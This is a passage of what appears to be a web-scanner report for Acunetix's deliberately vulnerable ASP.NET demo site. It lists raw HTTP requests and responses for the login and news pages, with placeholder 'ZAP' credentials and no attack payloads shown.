style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTV